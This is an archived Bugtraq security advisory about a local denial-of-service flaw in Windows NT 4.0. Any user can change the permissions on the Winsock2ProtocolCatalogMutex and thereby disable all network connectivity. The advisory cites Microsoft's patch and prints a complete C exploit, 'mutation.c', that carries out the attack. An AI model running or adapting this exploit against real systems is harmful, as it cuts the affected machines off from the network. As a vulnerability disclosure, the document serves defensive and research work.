Bugtraq mailing list archives
ntsecurity.nu advisory: Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below
From: Arne Vidstrom <arne.vidstrom () NTSECURITY NU>
Date: Fri, 26 Jan 2001 19:23:59 +0100
-- Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below -- Author: Arne Vidstrom (arne.vidstrom () ntsecurity nu) - http://ntsecurity.nu Severity: Denial Of Service if the attacker is able to execute the exploit code under any account on the system. Remote exploitation is not possible. Details: There is a mutex called Winsock2ProtocolCatalogMutex in Windows NT 4.0, to which the Everyone group has Full Control. Any user can change this to No Access, and that disables all network connectivity through Winsock until the system is rebooted. Vendor Response: Microsoft has released a patch and you can read more about it in their Security Bulletin at http://www.microsoft.com/technet/security/bulletin/ms01-003.asp. Sample exploit code: /* /* mutation.c - (c) 2000, Arne Vidstrom, arne.vidstrom () ntsecurity nu /* http://ntsecurity.nu /* /* - Disables all network connectivity through Winsock /* - Can be run from any account (e.g. an ordinary User account) /* */ #include <windows.h> #include <aclapi.h> int main(void) { PSID pEveryoneSID; SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY; PACL pDacl; DWORD sizeNeeded; AllocateAndInitializeSid(&iWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, &pEveryoneSID); sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) + GetLengthSid(pEveryoneSID) - sizeof(DWORD); pDacl = (PACL) malloc(sizeNeeded); InitializeAcl(pDacl, sizeNeeded, ACL_REVISION); AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID); SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex", SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pDacl, NULL); free(pDacl); return 0; }
Current thread:
- ntsecurity.nu advisory: Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below Arne Vidstrom (Jan 28)